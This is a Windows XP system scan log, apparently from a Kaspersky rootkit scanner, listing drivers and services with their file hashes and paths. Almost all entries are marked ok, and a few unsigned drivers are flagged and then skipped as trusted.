20:17:47.0687 0x0ae0  [ BEB3BA25197665D82EC7065B724171C6, 7E71C13BA30CD95CEE8A9CC85E6F48A01F30EDEAADEE69D80AE828BF97E5A5CA ] PartMgr         C:\WINDOWS\system32\drivers\PartMgr.sys
20:17:47.0843 0x0ae0  PartMgr - ok
20:17:47.0875 0x0ae0  [ 70E98B3FD8E963A6A46A2E6247E0BEA1, 6771313EC41B3B5BFD398F60706E40BE71617046880CC352DD110B001AFC22A1 ] ParVdm          C:\WINDOWS\system32\drivers\ParVdm.sys
20:17:48.0000 0x0ae0  ParVdm - ok
20:17:48.0015 0x0ae0  [ A219903CCF74233761D92BEF471A07B1, D4E6C360A1D2FCA4D17C991B834D68BF20F5111DD06B1FAB8B22984804CEC269 ] PCI             C:\WINDOWS\system32\DRIVERS\pci.sys
20:17:48.0171 0x0ae0  PCI - ok
20:17:48.0187 0x0ae0  [ CCF5F451BB1A5A2A522A76E670000FF0, D63F7E5A39653EC9CCE94B7D84B2D3EBD4F54533BD65701020198724042C9257 ] PCIIde          C:\WINDOWS\system32\DRIVERS\pciide.sys
20:17:48.0328 0x0ae0  PCIIde - ok
20:17:48.0359 0x0ae0  [ 9E89EF60E9EE05E3F2EEF2DA7397F1C1, 0BA3DB21DC7C641C181E2635B5C9B73965FDCDCD3EBBBE48FCFEC1C8C987F617 ] Pcmcia          C:\WINDOWS\system32\drivers\Pcmcia.sys
20:17:48.0515 0x0ae0  Pcmcia - ok
20:17:48.0515 0x0ae0  perc2 - ok
20:17:48.0515 0x0ae0  perc2hib - ok
20:17:48.0562 0x0ae0  [ 65DF52F5B8B6E9BBD183505225C37315, 59C606977DB40A3443DFF0BE2A4C761824881B22C9FDB3D23F6486DB580E92A4 ] PlugPlay        C:\WINDOWS\system32\services.exe
20:17:48.0593 0x0ae0  PlugPlay - ok
20:17:48.0625 0x0ae0  [ 65BC271F337637731D3C71455AE1F476, DAD32B61FE0147F8D2DA4C8F016920CD6BB2098F16E3CC2768009763E71DEFBC ] Pml Driver HPZ12 C:\WINDOWS\system32\HPZipm12.dll
20:17:48.0656 0x0ae0  Pml Driver HPZ12 - detected UnsignedFile.Multi.Generic ( 1 )
20:17:51.0203 0x0ae0  Detect skipped due to KSN trusted
20:17:51.0203 0x0ae0  Pml Driver HPZ12 - ok
20:17:51.0218 0x0ae0  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] PolicyAgent     C:\WINDOWS\system32\lsass.exe
20:17:51.0390 0x0ae0  PolicyAgent - ok
20:17:51.0390 0x0ae0  [ EFEEC01B1D3CF84F16DDD24D9D9D8F99, C5F0C8C66A3AF7E7BB04CEDE4AC5306F8387AB384A2107DC5BE413AAE968EFF1 ] PptpMiniport    C:\WINDOWS\system32\DRIVERS\raspptp.sys
20:17:51.0531 0x0ae0  PptpMiniport - ok
20:17:51.0546 0x0ae0  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] ProtectedStorage C:\WINDOWS\system32\lsass.exe
20:17:51.0671 0x0ae0  ProtectedStorage - ok
20:17:51.0703 0x0ae0  [ 09298EC810B07E5D582CB3A3F9255424, 35473A1BE25AC289474090EB0806AC6B3035DC33D1F3DF97A14BF1E361AC6AC3 ] PSched          C:\WINDOWS\system32\DRIVERS\psched.sys
20:17:51.0843 0x0ae0  PSched - ok
20:17:51.0875 0x0ae0  [ 00B670D8A36C7134CFC66B446A18CC92, 4D9DAEE5C9AED4AC6622AB8EFA634FE1E525B604604B5D655533DB4579964B62 ] psdfilter       C:\WINDOWS\system32\Drivers\psdfilter.sys
20:17:51.0890 0x0ae0  psdfilter - detected UnsignedFile.Multi.Generic ( 1 )
20:17:54.0515 0x0ae0  Detect skipped due to KSN trusted
20:17:54.0515 0x0ae0  psdfilter - ok
20:17:54.0546 0x0ae0  [ E9A60343CB7C39090638B1DD574F26EB, 52632F9E16C3B2BDF054D6AFB9BFF0FCD81F399669819C092D95128ED4D14BE0 ] psdvdisk        C:\WINDOWS\system32\Drivers\psdvdisk.sys
20:17:54.0546 0x0ae0  psdvdisk - detected UnsignedFile.Multi.Generic ( 1 )
20:17:57.0500 0x0ae0  Detect skipped due to KSN trusted
20:17:57.0500 0x0ae0  psdvdisk - ok
20:17:57.0531 0x0ae0  [ 80D317BD1C3DBC5D4FE7B1678C60CADD, DA76804B55D0CAB3DDD01EFC06673764AE4860693375C658B6063FB14AF7F12C ] Ptilink         C:\WINDOWS\system32\DRIVERS\ptilink.sys
20:17:57.0703 0x0ae0  Ptilink - ok
20:17:57.0703 0x0ae0  ql1080 - ok
20:17:57.0718 0x0ae0  Ql10wnt - ok
20:17:57.0718 0x0ae0  ql12160 - ok
20:17:57.0734 0x0ae0  ql1240 - ok
20:17:57.0734 0x0ae0  ql1280 - ok
20:17:57.0750 0x0ae0  [ FE0D99D6F31E4FAD8159F690D68DED9C, 998685622ABE631984B7E4DBF91AB3594B1F574378D75EB9F6265F4650470692 ] RasAcd          C:\WINDOWS\system32\DRIVERS\rasacd.sys
20:17:57.0875 0x0ae0  RasAcd - ok
20:17:57.0906 0x0ae0  [ AD188BE7BDF94E8DF4CA0A55C00A5073, C7D76CB579FAEBCCC2873499441BACDD6BD6668ACF5ED7F31862656E96E2B20C ] RasAuto         C:\WINDOWS\System32\rasauto.dll
20:17:58.0062 0x0ae0  RasAuto - ok
20:17:58.0093 0x0ae0  [ 11B4A627BC9614B885C4969BFA5FF8A6, EAE0A412A2B0F68919C32A96B3A08CC1A06585E4998819F5C9051745F63FF5AD ] Rasl2tp         C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
20:17:58.0234 0x0ae0  Rasl2tp - ok
20:17:58.0265 0x0ae0  [ 76A9A3CBEADD68CC57CDA5E1D7448235, 4AFD048C5D2306AB8DE46F3AA60AC0213333DDA3B09A9E91F7585DB6EB978EC8 ] RasMan          C:\WINDOWS\System32\rasmans.dll
20:17:58.0406 0x0ae0  RasMan - ok
20:17:58.0437 0x0ae0  [ 5BC962F2654137C9909C3D4603587DEE, A5CE5653D0105240F5E86CFAAB89E7917D42D939E2F27A5A7D6979289CA651B8 ] RasPppoe        C:\WINDOWS\system32\DRIVERS\raspppoe.sys
20:17:58.0578 0x0ae0  RasPppoe - ok
20:17:58.0609 0x0ae0  [ FDBB1D60066FCFBB7452FD8F9829B242, 10A2DACF944BD000032EBA8C095CB3D879CC55B28C377ADF6E52E508E47444DB ] Raspti          C:\WINDOWS\system32\DRIVERS\raspti.sys
20:17:58.0734 0x0ae0  Raspti - ok
20:17:58.0781 0x0ae0  [ 7AD224AD1A1437FE28D89CF22B17780A, 6645235CA27D671954E3557FA37082881C3D7D47492C71264CD8CB8D108EC801 ] Rdbss           C:\WINDOWS\system32\DRIVERS\rdbss.sys
20:17:58.0937 0x0ae0  Rdbss - ok
20:17:58.0953 0x0ae0  [ 4912D5B403614CE99C28420F75353332, 975341ECD660209987B5E5171B8315E032439E408CBE8A5986E67AF767F373BB ] RDPCDD          C:\WINDOWS\system32\DRIVERS\RDPCDD.sys
20:17:59.0093 0x0ae0  RDPCDD - ok
20:17:59.0125 0x0ae0  [ 15CABD0F7C00C47C70124907916AF3F1, 66B5C978B7FB6359AD8BAC9F568FE9D469E358FEAB07B1F129BA9E85F1DF723E ] rdpdr           C:\WINDOWS\system32\DRIVERS\rdpdr.sys
20:17:59.0281 0x0ae0  rdpdr - ok
20:17:59.0312 0x0ae0  [ 43AF5212BD8FB5BA6EED9754358BD8F7, AF330F61CECA4AFA359CEABC5EB3227E6B56A9A2DCE50701381D665122D7356D ] RDPWD           C:\WINDOWS\system32\drivers\RDPWD.sys
20:17:59.0359 0x0ae0  RDPWD - ok
20:17:59.0390 0x0ae0  [ 3C37BF86641BDA977C3BF8A840F3B7FA, AB9A6E54DBA3F4561CD4837372BECCE0D73943D02E3288F944333039375AC08C ] RDSessMgr       C:\WINDOWS\system32\sessmgr.exe
20:17:59.0546 0x0ae0  RDSessMgr - ok
20:17:59.0578 0x0ae0  [ F828DD7E1419B6653894A8F97A0094C5, E6150E1F598BA4CFEDB8FF075BC0D576518C331B864388F1CAE8812EFF106ECF ] redbook         C:\WINDOWS\system32\DRIVERS\redbook.sys
20:17:59.0921 0x0ae0  redbook - ok
20:17:59.0968 0x0ae0  [ 7E699FF5F59B5D9DE5390E3C34C67CF5, 3FCF0442D80AB181FED4303E570378736AA1F8718C0B8B70F689A1E45200FFE4 ] RemoteAccess    C:\WINDOWS\System32\mprdim.dll
20:18:00.0125 0x0ae0  RemoteAccess - ok
20:18:00.0156 0x0ae0  [ 5B19B557B0C188210A56A6B699D90B8F, 0FA880B81AE615206FD1738B83428AAA491D54B24168339DE6E87FDE8C6C14B0 ] RemoteRegistry  C:\WINDOWS\system32\regsvc.dll
20:18:00.0312 0x0ae0  RemoteRegistry - ok
20:18:00.0328 0x0ae0  [ D8B0B4ADE32574B2D9C5CC34DC0DBBE7, CDF10D3D8ADA7ADB1CC1567BFA986557C6D69F4099B70FDFABD4C3D09E3CA778 ] ROOTMODEM       C:\WINDOWS\system32\Drivers\RootMdm.sys
20:18:00.0468 0x0ae0  ROOTMODEM - ok
20:18:00.0500 0x0ae0  [ AAED593F84AFA419BBAE8572AF87CF6A, CC0FFC5A69394C8830DC66320DA01A820BBF41AD7E57D0FC343561DC5EF9A360 ] RpcLocator      C:\WINDOWS\system32\locator.exe
20:18:00.0656 0x0ae0  RpcLocator - ok
20:18:00.0687 0x0ae0  [ 6B27A5C03DFB94B4245739065431322C, 6AEAC16AB4E0DFD25123AAF4D4181FEE1B919B7B2793117006CE8CF30E826CFD ] RpcSs           C:\WINDOWS\System32\rpcss.dll
20:18:00.0718 0x0ae0  RpcSs - ok
20:18:00.0750 0x0ae0  [ 471B3F9741D762ABE75E9DEEA4787E47, D9ADE42965EC22AEB4B2AD21D429C3C8232A60AA9853DEFDA7AED86A13FE8623 ] RSVP            C:\WINDOWS\system32\rsvp.exe
20:18:00.0906 0x0ae0  RSVP - ok
20:18:00.0921 0x0ae0  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] SamSs           C:\WINDOWS\system32\lsass.exe
20:18:01.0062 0x0ae0  SamSs - ok
20:18:01.0093 0x0ae0  [ 39763504067962108505BFF25F024345, 73C9710B61EDC7FBEDE1D7A767AA3D3A169E7AD012494D05CB5EE7E5C5752BB9 ] SASDIFSV        C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS
20:18:01.0109 0x0ae0  SASDIFSV - ok
20:18:01.0109 0x0ae0  [ 77B9FC20084B48408AD3E87570EB4A85, B5BC5FEC1356DECB66A7A671DB67112BDAC8F942BF1C4B986B1805B41EF362B1 ] SASKUTIL        C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS
20:18:01.0125 0x0ae0  SASKUTIL - ok
20:18:01.0156 0x0ae0  [ 86D007E7A654B9A71D1D7D856B104353, 7B1DE53D637A5FC9619D5D07C48927AFEC89D959207F6F2E2F45DD054EEA04C7 ] SCardSvr        C:\WINDOWS\System32\SCardSvr.exe
20:18:01.0312 0x0ae0  SCardSvr - ok
20:18:01.0359 0x0ae0  [ 0A9A7365A1CA4319AA7C1D6CD8E4EAFA, 0B582F47BD70732BAC48B8B86E5D06CE7F299A20E8177F3F2E6F28217C3FB605 ] Schedule        C:\WINDOWS\system32\schedsvc.dll
20:18:01.0515 0x0ae0  Schedule - ok
20:18:01.0546 0x0ae0  [ 90A3935D05B494A5A39D37E71F09A677, F72733A69BC6E1A2BB91D7632FF3463C12563F60FDCC00A2CDD67FF20D479952 ] Secdrv          C:\WINDOWS\system32\DRIVERS\secdrv.sys
20:18:01.0687 0x0ae0  Secdrv - ok
20:18:01.0703 0x0ae0  [ CBE612E2BB6A10E3563336191EDA1250, C331797DC3569F0E715766561DE2562F60B924378842246C35D2B1CF867E9D96 ] seclogon        C:\WINDOWS\System32\seclogon.dll
20:18:01.0859 0x0ae0  seclogon - ok
20:18:01.0890 0x0ae0  [ 7FDD5D0684ECA8C1F68B4D99D124DCD0, 7105B026F966A992430F86C3698ABE15EC73E4772F1A3E362E29FD5247A5DCA6 ] SENS            C:\WINDOWS\system32\sens.dll
20:18:02.0031 0x0ae0  SENS - ok
20:18:02.0062 0x0ae0  [ 0F29512CCD6BEAD730039FB4BD2C85CE, 4F98AE390D1B14A755700DD6CEFB9CF921F0404AF2145D2D7E5F52394F87C6A5 ] serenum         C:\WINDOWS\system32\DRIVERS\serenum.sys
20:18:02.0203 0x0ae0  serenum - ok
20:18:02.0234 0x0ae0  [ CCA207A8896D4C6A0C9CE29A4AE411A7, 5999B39242283CD803319AADCA171CCCC6E2A40FB2FAFA51B1D29F3FF2DD8D6C ] Serial          C:\WINDOWS\system32\DRIVERS\serial.sys
20:18:02.0375 0x0ae0  Serial - ok
20:18:02.0421 0x0ae0  [ 8E6B8C671615D126FDC553D1E2DE5562, CEEC0067514555D5CA489F50E3D7562FCA8DB8E952C3C878604C9277FC77959F ] Sfloppy         C:\WINDOWS\system32\drivers\Sfloppy.sys
20:18:02.0578 0x0ae0  Sfloppy - ok
20:18:02.0609 0x0ae0  [ 83F41D0D89645D7235C051AB1D9523AC, B681F33EEAA511D6A2DCB9FBAA407B739184C9FF6067C6B7E51F1FC37E9D4DD7 ] SharedAccess    C:\WINDOWS\System32\ipnathlp.dll
20:18:02.0781 0x0ae0  SharedAccess - ok
20:18:02.0796 0x0ae0  [ 99BC0B50F511924348BE19C7C7313BBF, A1006C687BD352F700B140DC741515A0CDD9E1352C0FBD1EE410D404E344444B ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll
20:18:02.0843 0x0ae0  ShellHWDetection - ok
20:18:02.0859 0x0ae0  Simbad - ok
20:18:02.0875 0x0ae0  Sparrow - ok
20:18:02.0906 0x0ae0  [ AB8B92451ECB048A4D1DE7C3FFCB4A9F, DD17733CBB370FCA08F0296704D7CBEACA3C8F76D0ABE4761C3B1FFDF7481D9E ] splitter        C:\WINDOWS\system32\drivers\splitter.sys
20:18:03.0046 0x0ae0  splitter - ok
20:18:03.0062 0x0ae0  [ 60784F891563FB1B767F70117FC2428F, E0B07F08E60FFBAD36C2E58180F4B2A16DCA47716044CBE0213DF7B74D742F1F ] Spooler         C:\WINDOWS\system32\spoolsv.exe
20:18:03.0109 0x0ae0  Spooler - ok
20:18:03.0125 0x0ae0  [ 76BB022C2FB6902FD5BDD4F78FC13A5D, 6031CB2344D7277FC703480EB43CF856A0F8F818EA98FF26A2CA532336CD2DFA ] sr              C:\WINDOWS\system32\DRIVERS\sr.sys
20:18:03.0265 0x0ae0  sr - ok
20:18:03.0312 0x0ae0  [ 3805DF0AC4296A34BA4BF93B346CC378, B57A14F1B7B0997E619DDD62B73157AA2399A9852166FB58139CBB358A88F6F3 ] srservice       C:\WINDOWS\system32\srsvc.dll
20:18:03.0453 0x0ae0  srservice - ok
20:18:03.0500 0x0ae0  [ 47DDFC2F003F7F9F0592C6874962A2E7, 17C643BD4EB09B5666FE41817DC785BE04A6E491CE79E8E5A702CDBD98E1BDD7 ] Srv             C:\WINDOWS\system32\DRIVERS\srv.sys
20:18:03.0562 0x0ae0  Srv - ok
20:18:03.0593 0x0ae0  [ 0A5679B3714EDAB99E357057EE88FCA6, 01E1A101FFF48402C77E385A78FEF27876E04533B60EB1C18558A737E57E5FA8 ] SSDPSRV         C:\WINDOWS\System32\ssdpsrv.dll
20:18:03.0734 0x0ae0  SSDPSRV - ok
20:18:03.0750 0x0ae0  [ A9573045BAA16EAB9B1085205B82F1ED, 6A4D68BCD4968C17451EB1C4AB420FFA844D089845520D222BC4A2BD14583C56 ] StillCam        C:\WINDOWS\system32\DRIVERS\serscan.sys
20:18:03.0890 0x0ae0  StillCam - ok
20:18:03.0937 0x0ae0  [ 8BAD69CBAC032D4BBACFCE0306174C30, 2AA0DA710FCBFF38FE8DA91EE02E7A4503269347E61F8D3246FCA3384BBA2305 ] stisvc          C:\WINDOWS\system32\wiaservc.dll
20:18:04.0109 0x0ae0  stisvc - ok
20:18:04.0171 0x0ae0  [ 2E5586392CDFBD1D73BADB20E9ED6386, 8C296A4EB50750D5CC59C8B96034017AD957F8BE09153196778A519F061876EA ] SupportSoft RemoteAssist C:\Program Files\Common Files\SupportSoft\bin\ssrc.exe
20:18:04.0203 0x0ae0  SupportSoft RemoteAssist - ok
20:18:04.0234 0x0ae0  [ 3941D127AEF12E93ADDF6FE6EE027E0F, EA1F0E32E1C5E90FA4AAC421DEBBE086512340758D3217A6334E886BCE638B51 ] swenum          C:\WINDOWS\system32\DRIVERS\swenum.sys
20:18:04.0375 0x0ae0  swenum - ok
20:18:04.0406 0x0ae0  [ 8CE882BCC6CF8A62F2B2323D95CB3D01, B408550A581F3DA222355964AFA4E976AD8471F0AA37573C42C4948AE5A23A3B ] swmidi          C:\WINDOWS\system32\drivers\swmidi.sys
20:18:04.0531 0x0ae0  swmidi - ok
20:18:04.0546 0x0ae0  SwPrv - ok
20:18:04.0562 0x0ae0  symc810 - ok
20:18:04.0562 0x0ae0  symc8xx - ok
20:18:04.0593 0x0ae0  [ B226F8A4D780ACDF76145B58BB791D5B, 6E8304956E9FD827A2FCAB0CB9D200500E8E71CE79C9909684666DD548D3FD31 ] symlcbrd        C:\WINDOWS\system32\drivers\symlcbrd.sys
20:18:04.0609 0x0ae0  symlcbrd - ok
20:18:04.0625 0x0ae0  sym_hi - ok
20:18:04.0625 0x0ae0  sym_u3 - ok
20:18:04.0640 0x0ae0  [ 8B83F3ED0F1688B4958F77CD6D2BF290, 546D3602183702B4F53E84413CFA2C933D64C8540378E54A8DCD148F3F36A2DA ] sysaudio        C:\WINDOWS\system32\drivers\sysaudio.sys
20:18:04.0781 0x0ae0  sysaudio - ok
20:18:04.0812 0x0ae0  [ C7ABBC59B43274B1109DF6B24D617051, 4384CA0AA6CE9B603CF7DB775A3C721E46715D5B120B94FB57DEADAADE18535B ] SysmonLog       C:\WINDOWS\system32\smlogsvc.exe
20:18:04.0968 0x0ae0  SysmonLog - ok
20:18:05.0000 0x0ae0  [ 3CB78C17BB664637787C9A1C98F79C38, F35C31F6B7F366CB949D1044B357C76DEC9170441C5E559802794F62B72FD255 ] TapiSrv         C:\WINDOWS\System32\tapisrv.dll
20:18:05.0156 0x0ae0  TapiSrv - ok
20:18:05.0203 0x0ae0  [ 9AEFA14BD6B182D61E3119FA5F436D3D, EA29E49434585409272E7901AF89771FE9D6E911A7DC44AB3C7020CFF8A44552 ] Tcpip           C:\WINDOWS\system32\DRIVERS\tcpip.sys
20:18:05.0250 0x0ae0  Tcpip - ok
20:18:05.0281 0x0ae0  [ 6471A66807F5E104E4885F5B67349397, F35CBFFB8BB235CCE30EF94A5273333900DD49FD506BF9D55D99A320B8A53A5A ] TDPIPE          C:\WINDOWS\system32\drivers\TDPIPE.sys
20:18:05.0421 0x0ae0  TDPIPE - ok
20:18:05.0437 0x0ae0  [ C56B6D0402371CF3700EB322EF3AAF61, 7743FA4C734BCE38EFB1CA69BC17364D8421E2CD172F856F7E38E7AE1EE93F2F ] TDTCP           C:\WINDOWS\system32\drivers\TDTCP.sys
20:18:05.0578 0x0ae0  TDTCP - ok
20:18:05.0609 0x0ae0  [ 88155247177638048422893737429D9E, B6D4E8691917946332C2208D01F8C8281978C1AD1E9951C5D99DF0D49AC34B3B ] TermDD          C:\WINDOWS\system32\DRIVERS\termdd.sys
20:18:05.0765 0x0ae0  TermDD - ok
20:18:05.0812 0x0ae0  [ FF3477C03BE7201C294C35F684B3479F, D6246521539BA4ACD022D26983182F5E323D2EF1EA7C54265A248C43A1CE5202 ] TermService     C:\WINDOWS\System32\termsrv.dll
20:18:05.0968 0x0ae0  TermService - ok
20:18:06.0000 0x0ae0  [ 99BC0B50F511924348BE19C7C7313BBF, A1006C687BD352F700B140DC741515A0CDD9E1352C0FBD1EE410D404E344444B ] Themes          C:\WINDOWS\System32\shsvcs.dll
20:18:06.0015 0x0ae0  Themes - ok
20:18:06.0046 0x0ae0  [ DB7205804759FF62C34E3EFD8A4CC76A, 13A4248F528CE98ACA66898E56822E4FC49B11F491FF1F61A687BA601BF0A802 ] TlntSvr         C:\WINDOWS\system32\tlntsvr.exe
20:18:06.0187 0x0ae0  TlntSvr - ok
20:18:06.0187 0x0ae0  TosIde - ok
20:18:06.0218 0x0ae0  [ 55BCA12F7F523D35CA3CB833C725F54E, 849FB1AE31B143B14B298BBC0D91230693D41DEB95F46516878F53A7F4186C38 ] TrkWks          C:\WINDOWS\system32\trkwks.dll
20:18:06.0359 0x0ae0  TrkWks - ok
20:18:06.0375 0x0ae0  [ E0C67BE430C6DE490D6CCAECFA071F9E, 831858F9A07122FBE513FC56D79F39F973FC9BA757D509C113AA975DE8A70EE5 ] UBHelper        C:\WINDOWS\system32\drivers\UBHelper.sys
20:18:06.0390 0x0ae0  UBHelper - detected UnsignedFile.Multi.Generic ( 1 )
20:18:09.0265 0x0ae0  Detect skipped due to KSN trusted
20:18:09.0265 0x0ae0  UBHelper - ok
20:18:09.0296 0x0ae0  [ 5787B80C2E3C5E2F56C2A233D91FA2C9, 3774905CF77954DFCECDA5BCC7CDE3D0ED72712BFAAD85ADAE5246306447E46C ] Udfs            C:\WINDOWS\system32\drivers\Udfs.sys
20:18:09.0468 0x0ae0  Udfs - ok
20:18:09.0484 0x0ae0  ultra - ok
20:18:09.0515 0x0ae0  [ 402DDC88356B1BAC0EE3DD1580C76A31, 32A686595710336A6BFD54C03F552AE39439611662F84EF5D24193AE5665C6F3 ] Update          C:\WINDOWS\system32\DRIVERS\update.sys
20:18:09.0703 0x0ae0  Update - ok
20:18:09.0765 0x0ae0  [ 1EBAFEB9A3FBDC41B8D9C7F0F687AD91, 7746916DB48E3F5B243B63C066596AD9037A494BF1AD935946DD04AC85D983DF ] upnphost        C:\WINDOWS\System32\upnphost.dll
20:18:09.0937 0x0ae0  upnphost - ok
20:18:09.0968 0x0ae0  [ 05365FB38FCA1E98F7A566AAAF5D1815, 16843048CEEC3DAA3B953A12FF1EE339E86783A08F2A56DA7F94AD9F9717D77D ] UPS             C:\WINDOWS\System32\ups.exe
20:18:10.0125 0x0ae0  UPS - ok
20:18:10.0156 0x0ae0  [ 73B41F4EAD65F355962168D766AF0F2E, AA33CAE55D4766C9F1E9F1B50EEAE1CA4BE968380C89892A46D2D25EAEEDC64D ] USBAAPL         C:\WINDOWS\system32\Drivers\usbaapl.sys
20:18:10.0203 0x0ae0  USBAAPL - ok
20:18:10.0234 0x0ae0  [ 1B611611C28D2DF25BC057D79C6F13FC, B0D86F63E44B40413BBAE6402CC088046CFAE082D41BBC2ED5A916293356B846 ] usbccgp         C:\WINDOWS\system32\DRIVERS\usbccgp.sys
20:18:10.0281 0x0ae0  usbccgp - ok
20:18:10.0296 0x0ae0  [ 4BAC8DF07F1D8434FC640E677A62204E, 76C1351AF6752224BF59DEEE0F8665FE699F3DFD679F5BCD01C7D9383E6402A4 ] usbehci         C:\WINDOWS\system32\DRIVERS\usbehci.sys
20:18:10.0328 0x0ae0  usbehci - ok
20:18:10.0375 0x0ae0  [ 1AB3CDDE553B6E064D2E754EFE20285C, A99C4528C4227B1E96847614745AAFACD3C5F1BDFE435214DBF78740FFB300FE ] usbhub          C:\WINDOWS\system32\DRIVERS\usbhub.sys
20:18:10.0515 0x0ae0  usbhub - ok
20:18:10.0546 0x0ae0  [ A717C8721046828520C9EDF31288FC00, 1530BBE832EDBB0974AD89D723A03FF7A0094B368992D73C2C3E62A181DF1E0A ] usbprint        C:\WINDOWS\system32\DRIVERS\usbprint.sys
20:18:10.0703 0x0ae0  usbprint - ok
20:18:10.0765 0x0ae0  [ F8EDE2B6928970DCE3D5614C27D9E7F6, 6E5EBBC8B70C1D593634DAF0C190DEADFDA18C3CBC8F552A76F156F3869EF05B ] usbscan         C:\WINDOWS\system32\DRIVERS\usbscan.sys
20:18:10.0796 0x0ae0  usbscan - ok
20:18:10.0796 0x0ae0  [ A32426D9B14A089EAA1D922E0C5801A9, ED1DC52EE45F8EAD3AEC4B1F817BB25634141CF48295494C5947DCE6CF7A9817 ] USBSTOR         C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS
20:18:10.0968 0x0ae0  USBSTOR - ok
20:18:10.0984 0x0ae0  [ 26496F9DEE2D787FC3E61AD54821FFE6, 8BE7FF647470B9A951CBB478FAF83D657A15CC78037F42348A6B738F21D523DA ] usbuhci         C:\WINDOWS\system32\DRIVERS\usbuhci.sys
20:18:11.0140 0x0ae0  usbuhci - ok
20:18:11.0156 0x0ae0  [ 0D3A8FAFCEACD8B7625CD549757A7DF1, B9CFDEFCD66AA139F3DC2F967B184669532922563AD5A71769BABDC4370D065E ] VgaSave         C:\WINDOWS\System32\drivers\vga.sys
20:18:11.0296 0x0ae0  VgaSave - ok
20:18:11.0296 0x0ae0  ViaIde - ok
20:18:11.0312 0x0ae0  [ 4C8FCB5CC53AAB716D810740FE59D025, 010EAC43DBED700B73E4FC908FAAF9F6A0168EBBD5D86751E49BC33AAA18BFA4 ] VolSnap         C:\WINDOWS\system32\drivers\VolSnap.sys
20:18:11.0468 0x0ae0  VolSnap - ok
20:18:11.0515 0x0ae0  [ 7A9DB3A67C333BF0BD42E42B8596854B, D31A9A3B1AAAB373EDD73B674102395212FCB616F829E938B7B2B7BE7D4752C5 ] VSS             C:\WINDOWS\System32\vssvc.exe
20:18:11.0671 0x0ae0  VSS - ok
20:18:11.0703 0x0ae0  [ 54AF4B1D5459500EF0937F6D33B1914F, FA1876888BCB9C72A92369DBED4FF1A8666784523FB41E618FA0919490FCDDB9 ] W32Time         C:\WINDOWS\system32\w32time.dll
20:18:11.0859 0x0ae0  W32Time - ok
20:18:11.0906 0x0ae0  [ E20B95BAEDB550F32DD489265C1DA1F6, 5589B2067E6C9FBA290D8C5EADDC198EBAF39C50C3CD7D2BC5CDA7CBFBC445E5 ] Wanarp          C:\WINDOWS\system32\DRIVERS\wanarp.sys
20:18:12.0046 0x0ae0  Wanarp - ok
20:18:12.0062 0x0ae0  [ 6768ACF64B18196494413695F0C3A00F, 3A8F8586F1D997D19A8478345338D2AECD785AEABDB61531DD3F92003D3230A5 ] wdmaud          C:\WINDOWS\system32\drivers\wdmaud.sys
20:18:12.0218 0x0ae0  wdmaud - ok
20:18:12.0250 0x0ae0  [ 77A354E28153AD2D5E120A5A8687BC06, 8B2D37A4443501C0A8E70BC2079BE27F0A36FD07B561E6F68B40A72EABBC2DFE ] WebClient       C:\WINDOWS\System32\webclnt.dll
20:18:12.0390 0x0ae0  WebClient - ok
20:18:12.0468 0x0ae0  [ 2D0E4ED081963804CCC196A0929275B5, E1D75C7D7233D81DFDE13160B0C80138DF8B35230D04FB79B367A52FACF69BF8 ] winmgmt         C:\WINDOWS\system32\wbem\WMIsvc.dll
20:18:12.0625 0x0ae0  winmgmt - ok
20:18:12.0765 0x0ae0  [ 5144AE67D60EC653F97DDF3FEED29E77, F6238767284B2356A9F502E2ACCFAAC283FA13CBF238E98B5115A55179526B10 ] wlidsvc         C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
20:18:12.0828 0x0ae0  wlidsvc - ok
20:18:12.0875 0x0ae0  [ C51B4A5C05A5475708E3C81C7765B71D, F776D2680BD3407307B7072626F78460361FC5BC38623C9E16F394D300AB25DE ] WmdmPmSN        C:\WINDOWS\system32\MsPMSNSv.dll
20:18:12.0937 0x0ae0  WmdmPmSN - ok
20:18:13.0000 0x0ae0  [ E76F8807070ED04E7408A86D6D3A6137, BFCF5361B7335760A7AE4B6958DE516A27AC60AA09135A46F0B49F588FAFE3A0 ] Wmi             C:\WINDOWS\System32\advapi32.dll
20:18:13.0093 0x0ae0  Wmi - ok
20:18:13.0125 0x0ae0  [ E0673F1106E62A68D2257E376079F821, 12992F18C9653050B10DC61D12988067933FCFDF02123D3A7EF5DE607A785DDC ] WmiApSrv        C:\WINDOWS\system32\wbem\wmiapsrv.exe
20:18:13.0296 0x0ae0  WmiApSrv - ok
20:18:13.0406 0x0ae0  [ F74E3D9A7FA9556C3BBB14D4E5E63D3B, C71FAAC752F6D58BF8556661252DBF8C5DDD090CAE002A2C7E09C9A014526066 ] WMPNetworkSvc   C:\Program Files\Windows Media Player\WMPNetwk.exe
20:18:13.0484 0x0ae0  WMPNetworkSvc - ok
20:18:13.0500 0x0ae0  [ CF4DEF1BF66F06964DC0D91844239104, CC1D9CECE2056D29A9651D51BB57C3F4F9BF9E90A4808CF7496C683C874FBD51 ] WpdUsb          C:\WINDOWS\system32\DRIVERS\wpdusb.sys
20:18:13.0531 0x0ae0  WpdUsb - ok
20:18:13.0656 0x0ae0  [ 15673BD0B86150CB8E27766059C72A9B, 56C23289A8BFF4945EE532CF6D62D3EC81B827CA15A359F30A327789F9FE9CAF ] WPFFontCache_v0400 C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
20:18:13.0703 0x0ae0  WPFFontCache_v0400 - ok
20:18:13.0734 0x0ae0  [ 6ABE6E225ADB5A751622A9CC3BC19CE8, 4061C5D0F051DFF1730E2A3BFC1CCA97B29602FC50F10F6B44D93B0D28F42024 ] WS2IFSL         C:\WINDOWS\System32\drivers\ws2ifsl.sys
20:18:13.0875 0x0ae0  WS2IFSL - ok
20:18:13.0906 0x0ae0  [ 7C278E6408D1DCE642230C0585A854D5, DA46079A04F6E8E3441E4AE454AEAC02B3E935DE29CE7F6D4476F57867FCC12A ] wscsvc          C:\WINDOWS\system32\wscsvc.dll
20:18:14.0093 0x0ae0  wscsvc - ok
